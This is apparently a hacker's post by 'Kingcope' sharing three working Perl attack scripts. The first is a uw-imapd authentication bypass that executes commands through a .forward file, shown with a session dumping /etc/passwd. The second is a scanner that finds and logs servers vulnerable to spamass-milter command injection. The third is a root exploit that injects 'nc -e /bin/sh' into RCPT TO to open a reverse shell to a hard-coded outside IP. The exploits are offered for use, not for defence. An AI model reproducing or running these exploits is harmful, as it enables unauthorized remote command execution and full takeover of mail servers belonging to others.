Here are two goodies.

1.) uw-imapd < imap-2004b Remote Exploit
2.) Spamass-milter 0day vulnerability verifier + root exploit (at the bottom)

WARNING: USE AT YOUR OWN RISK + YOU WON'T FIND MANY TARGETS FOR BOTHS VULNS, I VERIFIED.

---snip---
#!/usr/bin/perl
# CVE-2005-0198 Exploit by Kingcope
# Exploited in May 2010
# One can See from the imap Banner if the Server is Vulnerable:
# Vulnerable (CRAM-MD5 supported and right IMAP4rev1 Version) is e.g.:
# * OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] localhost IMAP4rev1 2002.332 at Sun, 14 Mar 2010 20:40:09 +0000 (GMT)
# You need a VALID username but NOT A VALID password
# Relies on both uw-imapd (< imap-2004b) and a MTA like sendmail to be installed remotely (.forward trickery).
# EXPLOIT SESSION:
#
#./imap.pl 192.168.2.17 kcope "cat /etc/passwd"
#uw-imapd (< imap-2004b) remote exploit by Kingcope
#* OK [CAPABILITY IMAP4REV1 LOGIN-REFERRALS AUTH=CRAM-MD5 AUTH=LOGIN] [192.168.2.
#17] IMAP4rev1 2003.338 at Sun, 14 Mar 2010 23:53:53 +0000 (GMT)
#
#++ Break In 1
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 NO AUTHENTICATE CRAM-MD5 failed
#A001 OK [CAPABILITY IMAP4REV1 IDLE NAMESPACE MAILBOX-REFERRALS BINARY UNSELECT S
#CAN SORT THREAD=REFERENCES THREAD=ORDEREDSUBJECT MULTIAPPEND] User kcope authent
#icated
#++ SUCCESS 1 - Authenticated
#++ Break In 2
#220 localhost.Belkin ESMTP Sendmail 8.12.9p2/8.12.9; Sun, 14 Mar 2010 23:54:08 G
#MT
#250 localhost.Belkin Hello [192.168.2.15], pleased to meet you
#250 2.1.0 me@foobar.org... Sender ok
#250 2.1.5 kcope@localhost.Belkin... Recipient ok
#354 Enter mail, end with "." on a line by itself
#250 2.0.0 o2ENs82U002757 Message accepted for delivery
#++ Waiting for .forward file to be executed
#A002 OK DELETE completed
#A002 OK CREATE completed
#+ Ready for argument
#A002 OK APPEND completed
#* 1 EXISTS
#* 1 RECENT
#* OK [UIDVALIDITY 1268610848] UID validity status
#* OK [UIDNEXT 2] Predicted next UID
#* NO [UIDNOTSTICKY] Non-permanent unique identifiers: /tmp/0wned
#* FLAGS (\Answered \Flagged \Deleted \Draft \Seen)
#* OK [PERMANENTFLAGS ()] Permanent flags
#* OK [UNSEEN 1] first unseen message in /tmp/0wned
#A002 OK [READ-ONLY] SELECT completed
#* 1 FETCH (BODY[] {1334}
#Date: Sun, 14 Mar 2010 23:54:08 +0000
#From: kcope@localhost.Belkin
#Subject: /tmp/0wned
#MIME-Version: 1.0
#Content-Type: TEXT/PLAIN; charset=US-ASCII

# $FreeBSD: src/etc/master.passwd,v 1.25.2.6 2002/06/30 17:57:17 des Exp $
#
#root:*:0:0:Charlie &:/root:/bin/csh
#toor:*:0:0:Bourne-again Superuser:/root:
#daemon:*:1:1:Owner of many system processes:/root:/sbin/nologin
#operator:*:2:5:System &:/:/sbin/nologin
#bin:*:3:7:Binaries Commands and Source:/:/sbin/nologin
#tty:*:4:65533:Tty Sandbox:/:/sbin/nologin
#kmem:*:5:65533:KMem Sandbox:/:/sbin/nologin
#games:*:7:13:Games pseudo-user:/usr/games:/sbin/nologin
#news:*:8:8:News Subsystem:/:/sbin/nologin
#man:*:9:9:Mister Man Pages:/usr/share/man:/sbin/nologin
#sshd:*:22:22:Secure Shell Daemon:/var/empty:/sbin/nologin
#smmsp:*:25:25:Sendmail Submission User:/var/spool/clientmqueue:/sbin/nologin
#mailnull:*:26:26:Sendmail Default User:/var/spool/mqueue:/sbin/nologin
#bind:*:53:53:Bind Sandbox:/:/sbin/nologin
#uucp:*:66:66:UUCP pseudo-user:/var/spool/uucppublic:/usr/libexec/uucp/uucico
#xten:*:67:67:X-10 daemon:/usr/local/xten:/sbin/nologin
#pop:*:68:6:Post Office Owner:/nonexistent:/sbin/nologin
#www:*:80:80:World Wide Web Owner:/nonexistent:/sbin/nologin
#nobody:*:65534:65534:Unprivileged user:/nonexistent:/sbin/nologin
#kcope:*:1001:0:User &:/home/kcope:/bin/sh
#)
#* 1 FETCH (FLAGS (\Recent \Seen))
#A002 OK FETCH completed

use Digest::HMAC_MD5 qw(hmac_md5_hex);
use MIME::Base64;
use IO::Socket::INET;

print "uw-imapd (< imap-2004b) remote exploit by Kingcope\r\n";

if ($#ARGV != 2) {
	print "usage: imap.pl <host> <user> <command>\n";
	print "example: imap.pl www.target.com foouser \"cat /etc/services\"\n";
	exit;
}

$host = $ARGV[0];
$command = $ARGV[2];
$|=1;

$sock = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => 143,
                              Proto    => 'tcp');
$resp = <$sock>;
print $resp."\n";

print "++ Break In 1\n";

for ($k=0;$k<5;$k++) {
print $sock "A001 AUTHENTICATE CRAM-MD5\r\n";
$resp = <$sock>;
print $resp;

if (index($resp, "+") != 0) {
	print "-- No CRAM-MD5 Authen supported .\n";
	exit;	
}

$user = $ARGV[1];
$secret = "waco";

@data = split(" ", $resp);
chomp($data[1]);

$stamp = $data[1];

$decoded_stamp = decode_base64($stamp);
$hmac = hmac_md5_hex($decoded_stamp, $secret);  
$answer = encode_base64($user . ' ' . $hmac);
chomp($answer);
print $sock $answer . "\r\n";
$resp = <$sock>;
print $resp;
if (index($resp, "OK ") >= 0) {
	goto Authenticated;	
}
}
print "-- Could not bypass Authen .\n";
exit;

Authenticated:
print "++ SUCCESS 1 - Authenticated\n";
print "++ Break In 2\n";

$msg = "|\"/bin/sh -c '$command' > /tmp/0wned 2>&1;\"";
print $sock "A002 DELETE .forward\r\n";
print $sock "A002 CREATE .forward\r\n";
print $sock "A002 APPEND .forward (\\Seen) {". length($msg) ."}\r\n" . $msg ."\r\n";

$sock2 = IO::Socket::INET->new(PeerAddr => $host,
                              PeerPort => 25,
                              Proto    => 'tcp');
$resp = <$sock2>;
print $resp;
print $sock2 "HELO you\r\n";
$resp = <$sock2>;
print $resp;
@remhost = split(" ", $resp);
print $sock2 "MAIL FROM: me\@foobar.org\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "RCPT TO: kcope\@$remhost[1]\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 "DATA\r\n";
$resp = <$sock2>;
print $resp;
print $sock2 ".\r\n";
$resp = <$sock2>;
print $resp;
print "++ Waiting for .forward file to be executed\r\n";
sleep(3);
print $sock "A002 SELECT /tmp/0wned\r\n";
$resp = <$sock>;
print $resp;
print $sock "A002 FETCH 1 BODY[]\r\n";

while(<$sock>) {
	print $_;	
}
---snip---

The following script will check if a remote server is vulnerable to
 the spamass-milter vulnerability.

---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

use IO::Socket;

$|=1;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;
if (!($x =~ "Blocked by SpamAssassin")) {
exit;
}

print "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
open LOGFILE, ">>log.txt";
print LOGFILE "\n\n$ARGV[0] RUNS SPAMASS-MILTER!\n";
close LOGFILE;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|pkill -HUP smtpd|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
	print "\n\n$ARGV[0] IS VULNERABLE!\n";
	open LOGFILE, ">>log.txt";
	print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
	close LOGFILE;
	exit;
}
print $x;
print $sock "RCPT TO: postmaster+(\"|pkill -HUP sendmail|\")\@$hostname[1]\r\n";
$x = <$sock>;
if ($x=="") {
	print "\n\n$ARGV[0] IS VULNERABLE!\n";
	open LOGFILE, ">>log.txt";
	print LOGFILE "\n\n$ARGV[0] IS VULNERABLE!\n";
	close LOGFILE;
	exit;
}
print $x;
print $sock "QUIT\r\n";

while(<$sock>) {
	print;
}
---snip---

Spamass-milter Root Exploit PoC

---snip---
#!/usr/bin/perl
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #
# postfix_joker.pl
# Postfix, Sendmail w/ spamass-milter Remote Root Exploit by Kingcope
# March 2010
# # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # # #

use IO::Socket;

$|=1;

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster\@$hostname[1]\r\n";
$x = <$sock>;
print $x;
print $sock "DATA\r\n";
$x = <$sock>;
print $x;
print $sock "XJS*C4JDBQADN1.NSBN3*2IDNEN*GTUBE-STANDARD-ANTI-UBE-TEST-EMAIL*C.34X\r\n";
print $sock "\r\n.\r\n";
$x = <$sock>;
print $x;

if (!($x =~ "Blocked by SpamAssassin")) {

exit;
}

$sock = IO::Socket::INET->new(PeerAddr => $ARGV[0],
                              PeerPort => '25',
                              Proto    => 'tcp');

$x = <$sock>;
print $x;
print $sock "HELO you.com\r\n";
$xown = <$sock>;
@hostname = split(" ", $xown);
print $xown;
print $sock "MAIL FROM: <root\@gmail.com>\r\n";
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+:(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n"; # POSTFIX!
$x = <$sock>;
print $x;
print $sock "RCPT TO: postmaster+(\"|nc -e /bin/sh 85.25.67.37 5555;sleep 1000|\")\@$hostname[1]\r\n";	# SENDMAIL!
$x = <$sock>;
print $x;
print $sock "QUIT\r\n";

while(<$sock>) {
	print;
}
---snip---

Cheers,

Kingcope